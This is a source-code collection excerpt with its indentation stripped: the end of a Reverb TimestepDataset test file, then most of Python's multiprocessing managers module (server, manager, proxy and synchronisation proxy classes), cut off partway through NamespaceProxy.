dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 20)
self.assertLen(got, 20)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertIsInstance(sample.info.key, np.uint64)
self.assertIsInstance(sample.info.probability, np.float64)
np.testing.assert_array_equal(sample.data[0],
np.ones((3, 3), dtype=np.int32))
@parameterized.parameters(1, 3, 7)
def test_respects_max_in_flight_samples_per_worker(
self, max_in_flight_samples_per_worker):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=max_in_flight_samples_per_worker)
iterator = dataset.make_initializable_iterator()
dataset_item = iterator.get_next()
self.evaluate(iterator.initializer)
for _ in range(100):
self.evaluate(dataset_item)
# Check that the buffer is incremented by steps of
# max_in_flight_samples_per_worker.
self.assertEqual(
self._get_num_samples('dist') % max_in_flight_samples_per_worker, 0)
def test_iterate_over_batched_blobs(self):
for _ in range(10):
self._client.insert((np.ones([3, 3], dtype=np.int32)), {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=(tf.int32,),
shapes=(tf.TensorShape([3, 3]),),
max_in_flight_samples_per_worker=100)
dataset = dataset.batch(5)
got = self._sample_from(dataset, 20)
self.assertLen(got, 20)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertEqual(sample.info.key.shape, (5,))
np.testing.assert_array_equal(sample.data[0],
np.ones((5, 3, 3), dtype=np.int32))
def test_converts_spec_lists_into_tuples(self):
for _ in range(10):
data = [
(np.ones([1, 1], dtype=np.int32),),
[
np.ones([3, 3], dtype=np.int8),
(np.ones([2, 2], dtype=np.float64),)
],
]
self._client.insert(data, {'dist': 1})
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=[
(tf.int32,),
[
tf.int8,
(tf.float64,),
],
],
shapes=[
(tf.TensorShape([1, 1]),),
[
tf.TensorShape([3, 3]),
(tf.TensorShape([2, 2]),),
],
],
max_in_flight_samples_per_worker=100)
got = self._sample_from(dataset, 10)
for sample in got:
self.assertIsInstance(sample, replay_sample.ReplaySample)
self.assertIsInstance(sample.info.key, np.uint64)
tree.assert_same_structure(sample.data, (
(None,),
(
None,
(None,),
),
))
def test_session_is_closed_while_op_pending(self):
dataset = timestep_dataset.TimestepDataset(
self._client.server_address,
table='dist',
dtypes=tf.float32,
shapes=tf.TensorShape([]),
max_in_flight_samples_per_worker=100)
iterator = dataset.make_initializable_iterator()
item = iterator.get_next()
def _session_closer(sess, wait_time_secs):
def _fn():
time.sleep(wait_time_secs)
sess.close()
return _fn
with self.session() as sess:
sess.run(iterator.initializer)
thread = threading.Thread(target=_session_closer(sess, 3))
thread.start()
with self.assertRaises(tf.errors.CancelledError):
sess.run(item)
class FromTableSignatureTest(tf.test.TestCase):
def test_table_not_found(self):
server = reverb_server.Server([
reverb_server.Table.queue('table_a', 10),
reverb_server.Table.queue('table_c', 10),
reverb_server.Table.queue('table_b', 10),
])
address = f'localhost:{server.port}'
with self.assertRaisesWithPredicateMatch(
ValueError,
f'Server at {address} does not contain any table named not_found. '
f'Found: table_a, table_b, table_c.'):
timestep_dataset.TimestepDataset.from_table_signature(
address, 'not_found', 100)
def test_server_not_found(self):
with self.assertRaises(errors.DeadlineExceededError):
timestep_dataset.TimestepDataset.from_table_signature(
'localhost:1234', 'not_found', 100, get_signature_timeout_secs=1)
def test_table_does_not_have_signature(self):
server = make_server()
address = f'localhost:{server.port}'
with self.assertRaisesWithPredicateMatch(
ValueError, f'Table dist at {address} does not have a signature.'):
timestep_dataset.TimestepDataset.from_table_signature(
address, 'dist', 100)
def test_sets_dtypes_from_signature(self):
signature = {
'a': {
'b': tf.TensorSpec([3, 3], tf.float32),
'c': tf.TensorSpec([], tf.int64),
},
'x': tf.TensorSpec([None], tf.uint64),
}
server = reverb_server.Server(
[reverb_server.Table.queue('queue', 10, signature=signature)])
dataset = timestep_dataset.TimestepDataset.from_table_signature(
f'localhost:{server.port}', 'queue', 100)
self.assertDictEqual(dataset.element_spec.data, signature)
def test_sets_dtypes_from_bounded_spec_signature(self):
bounded_spec_signature = {
'a': {
'b': tensor_spec.BoundedTensorSpec([3, 3], tf.float32, 0, 3),
'c': tensor_spec.BoundedTensorSpec([], tf.int64, 0, 5),
},
}
server = reverb_server.Server([
reverb_server.Table.queue(
'queue', 10, signature=bounded_spec_signature)
])
dataset = timestep_dataset.TimestepDataset.from_table_signature(
f'localhost:{server.port}', 'queue', 100)
self.assertDictEqual(
dataset.element_spec.data, {
'a': {
'b': tf.TensorSpec([3, 3], tf.float32),
'c': tf.TensorSpec([], tf.int64),
},
})
if __name__ == '__main__':
tf.disable_eager_execution()
tf.test.main()
|
managers.py
|
#
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import threading
import signal
import array
import queue
import time
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
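# A sketch of the request/response wire format, inferred from dispatch() above
# and Server.serve_client() below (a summary for orientation, not an official
# spec of this module):
#
#   request : (ident, methodname, args, kwds)       e.g. (None, 'dummy', (), {})
#   response: ('#RETURN', result)                   normal return value
#             ('#ERROR', exception_instance)        exception raised by the call
#             ('#PROXY', (exposed, token))          result is handed back as a proxy
#             ('#TRACEBACK', formatted_traceback)   server-side failure, as a string
#             ('#UNSERIALIZABLE', traceback)        result could not be pickled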
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
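# Example (illustrative only): for a plain queue.Queue instance, public_methods()
# returns names such as 'empty', 'full', 'get', 'put', 'put_nowait', 'qsize', ...
# This is what Server.create() exposes by default when a typeid is registered
# without an explicit `exposed` list.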
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
if not isinstance(authkey, bytes):
raise TypeError(
"Authkey {0!r} is type {1!s}, not bytes".format(
authkey, type(authkey)))
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.id_to_local_proxy_obj = {}
self.mutex = threading.Lock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__: # what about stderr?
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
try:
obj, exposed, gettypeid = id_to_obj[ident]
except KeyError as ke:
try:
obj, exposed, gettypeid = \
self.id_to_local_proxy_obj[ident]
except KeyError as second_ke:
raise ke
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception as e:
send(('#UNSERIALIZABLE', format_exc()))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
# Perhaps include debug info about 'c'?
with self.mutex:
result = []
keys = list(self.id_to_refcount.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
# Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
return len(self.id_to_refcount)
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(*args, **kwds):
'''
Create a new shared object and return its id
'''
if len(args) >= 3:
self, c, typeid, *args = args
elif not args:
raise TypeError("descriptor 'create' of 'Server' object "
"needs an argument")
else:
if 'typeid' not in kwds:
raise TypeError('create expected at least 2 positional '
'arguments, got %d' % (len(args)-1))
typeid = kwds.pop('typeid')
if len(args) >= 2:
self, c, *args = args
import warnings
warnings.warn("Passing 'typeid' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
else:
if 'c' not in kwds:
raise TypeError('create expected at least 2 positional '
'arguments, got %d' % (len(args)-1))
c = kwds.pop('c')
self, *args = args
import warnings
warnings.warn("Passing 'c' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
args = tuple(args)
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
if kwds or (len(args) != 1):
raise ValueError(
"Without callable, must have one non-keyword argument")
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
if not isinstance(method_to_typeid, dict):
raise TypeError(
"Method_to_typeid {0!r}: type {1!s}, not dict".format(
method_to_typeid, type(method_to_typeid)))
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
self.incref(c, ident)
return ident, tuple(exposed)
create.__text_signature__ = '($self, c, typeid, /, *args, **kwds)'
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
try:
self.id_to_refcount[ident] += 1
except KeyError as ke:
# If no external references exist but an internal (to the
# manager) still does and a new external reference is created
# from it, restore the manager's tracking of it from the
# previously stashed internal ref.
if ident in self.id_to_local_proxy_obj:
self.id_to_refcount[ident] = 1
self.id_to_obj[ident] = \
self.id_to_local_proxy_obj[ident]
obj, exposed, gettypeid = self.id_to_obj[ident]
util.debug('Server re-enabled tracking & INCREF %r', ident)
else:
raise ke
def decref(self, c, ident):
if ident not in self.id_to_refcount and \
ident in self.id_to_local_proxy_obj:
util.debug('Server DECREF skipping %r', ident)
return
with self.mutex:
if self.id_to_refcount[ident] <= 0:
raise AssertionError(
"Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
ident, self.id_to_obj[ident],
self.id_to_refcount[ident]))
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_refcount[ident]
if ident not in self.id_to_refcount:
# Two-step process in case the object turns out to contain other
# proxy objects (e.g. a managed list of managed lists).
# Otherwise, deleting self.id_to_obj[ident] would trigger the
# deleting of the stored value (another managed object) which would
# in turn attempt to acquire the mutex that is already held here.
self.id_to_obj[ident] = (None, (), None) # thread-safe
util.debug('disposing of obj with id %r', ident)
with self.mutex:
del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = { #XXX: register dill?
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
# bpo-36368: protect server process from KeyboardInterrupt signals
signal.signal(signal.SIGINT, signal.SIG_IGN)
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, /, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
if self._state.value != State.STARTED:
if self._state.value == State.INITIAL:
raise ProcessError("Unable to start server")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("Manager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
@property
def address(self):
return self._address
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()): # isinstance?
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, /, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True, manager_owned=False):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
# Should be set to True only when a proxy object is being created
# on the manager server; primary use case: nested proxy objects.
# RebuildProxy detects when a proxy is being created on the manager
# and sets this value appropriately.
self._owned_by_manager = manager_owned
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
if self._owned_by_manager:
util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
return
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
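# Sketch of what MakeProxyType() produces (illustrative; 'QueueProxy' and the
# method names are invented for the example):
#
#   QueueProxy = MakeProxyType('QueueProxy', ('get', 'put', 'qsize'))
#   # each generated method simply forwards to _callmethod, roughly:
#   #   def put(self, /, *args, **kwds):
#   #       return self._callmethod('put', args, kwds)
#
# The resulting class is cached by (name, exposed), so repeated calls with the
# same arguments return the same type object.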
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = getattr(time,'monotonic',time.time)() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - getattr(time,'monotonic',time.time)()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
